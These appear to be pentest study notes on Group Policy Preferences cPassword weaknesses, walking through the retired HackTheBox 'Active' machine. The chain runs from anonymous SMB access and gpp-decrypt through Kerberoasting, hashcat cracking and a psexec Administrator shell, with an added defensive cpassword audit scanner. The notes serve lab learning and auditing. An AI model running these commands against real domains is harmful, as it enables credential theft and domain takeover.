
# GPP/cPassword Attacks

* GPP (Group Policy Preferences) stores the password it sets in an XML file (e.g. `Groups.xml`) on the domain's policy share, encrypted with an AES key that Microsoft published, so anyone who can read the file can recover it
* Works over SMB (the share is reachable with smbclient)
* If we find 445 open we can try to log in anonymously. *Example from HTB - Active - Retired Machine*
* Tips: `prompt off` (no confirmation prompt for each downloaded file) and `recurse on` (recurse into subdirectories so `dir` and `mget` cover everything)

  ```
  ┌──(kali㉿kali)-[~]
  └─$ smbclient \\\\10.10.10.100\\Replication
  Enter WORKGROUP\kali's password: 
  Anonymous login successful
  Try "help" to get a list of possible commands.
  smb: \> dir
    .                                   D        0  Sat Jul 21 06:37:44 2018
    ..                                  D        0  Sat Jul 21 06:37:44 2018
    active.htb                          D        0  Sat Jul 21 06:37:44 2018

                  5217023 blocks of size 4096. 260455 blocks available
  smb: \> prompt off
  smb: \> 
  ```
* We can get all the files with `mget *`
* We are interested in the `Groups.xml` file, which lands in `active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/`
* We can just copy the `cpassword` value and decrypt it with gpp-decrypt (the AES key is public, so no cracking is needed): `gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ` And we get the password: `GPPstillStandingStrong2k18`
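
The audit side of the same weakness, as an added example that is not part of these notes or of gpp-decrypt: a scanner that walks a downloaded Policies tree, reports every non-empty `cpassword` attribute in any GPP preference XML with the account it belongs to, and checks that the decoded value has the 16-byte block alignment a real AES-CBC cpassword must have. The sample `Groups.xml`, its cpassword value and its account names are constructed; the account attribute names used (`userName`, `accountName`, `runAs`) are those of the Groups/Drives, Services and ScheduledTasks schemas.

```python
import base64
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, List

# Constructed sample of a GPP Groups.xml (made up for this example, not from any
# real domain). GPP stores cpassword as base64 with the trailing "=" stripped.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_backup" changed="2018-07-18 20:46:06">
    <Properties action="U" userName="svc_backup" cpassword="QUJDREVGR0hJSktMTU5PUEFCQ0RFRkdISUpLTE1OT1A" neverExpires="1"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="helpdesk" changed="2018-07-18 20:50:00">
    <Properties action="U" userName="helpdesk" cpassword="" noChange="1"/>
  </User>
</Groups>
"""

def pad_base64(value: str) -> str:
    """Restore the '=' padding GPP strips; gpp-decrypt does the same before decrypting."""
    return value + "=" * (-len(value) % 4)

def find_cpasswords(xml_text: str, source: str = "<inline>") -> List[Dict[str, object]]:
    """One finding per element with a non-empty cpassword, for any GPP preference file."""
    findings: List[Dict[str, object]] = []
    for elem in ET.fromstring(xml_text).iter():
        cpassword = elem.get("cpassword")
        if not cpassword:  # attribute absent or empty: no credential stored here
            continue
        try:
            ciphertext = base64.b64decode(pad_base64(cpassword), validate=True)
        except ValueError:
            ciphertext = b""  # corrupt value: still report it, but with length 0
        # account attribute differs per schema: Groups/Drives, Services, ScheduledTasks
        findings.append({"file": source, "element": elem.tag,
                         "account": elem.get("userName") or elem.get("accountName") or elem.get("runAs"),
                         "ciphertext_bytes": len(ciphertext),
                         # AES-CBC output is a multiple of 16 bytes; anything else is not a real cpassword
                         "aes_block_aligned": len(ciphertext) > 0 and len(ciphertext) % 16 == 0})
    return findings

def scan_directory(root_dir: str) -> List[Dict[str, object]]:
    """Audit every XML file under a downloaded Policies tree (e.g. the mget output above)."""
    findings: List[Dict[str, object]] = []
    for path in Path(root_dir).rglob("*.xml"):
        try:  # utf-8-sig drops the BOM that GPP files carry
            findings.extend(find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path)))
        except ET.ParseError:
            continue  # not well-formed XML: skip rather than abort the scan
    return findings
```

Run `scan_directory("active.htb")` against the tree pulled with `mget *`; any finding with `aes_block_aligned` true is a stored credential that should be removed from the policy and rotated.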

## HTB - Active - privesc

* The password obtained through GPP only gave us a standard user (SVC_TGS). To root the machine we use Kerberoasting again:

  ```
  ┌──(kali㉿kali)-[~]
  └─$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
  /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

  ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon           
  --------------------  -------------  --------------------------------------------------------  -------------------  -------------------
  active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40  2022-02-11 16:21:53 

  $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$50b[STRIPPED]1
  ```
* We can then crack the TGS hash with hashcat (mode 13100, Kerberos 5 TGS-REP etype 23)

  ```
  ┌──(root💀kali)-[~/active-directory]
  └─# hashcat -m 13100 hashkerb.txt /usr/share/wordlists/rockyou.txt -O
  [STRIPPED]
  $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4[STRIPPED]1:Ticketmaster1968
  ```
* And finally get a shell as Administrator using psexec.py (Impacket)

  ```
  ┌──(root💀kali)-[~/active-directory]
  └─# psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100  
  ```

## GPP - Resources

{% embed url="https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/" %}
Group Policy Pwnage
{% endembed %}
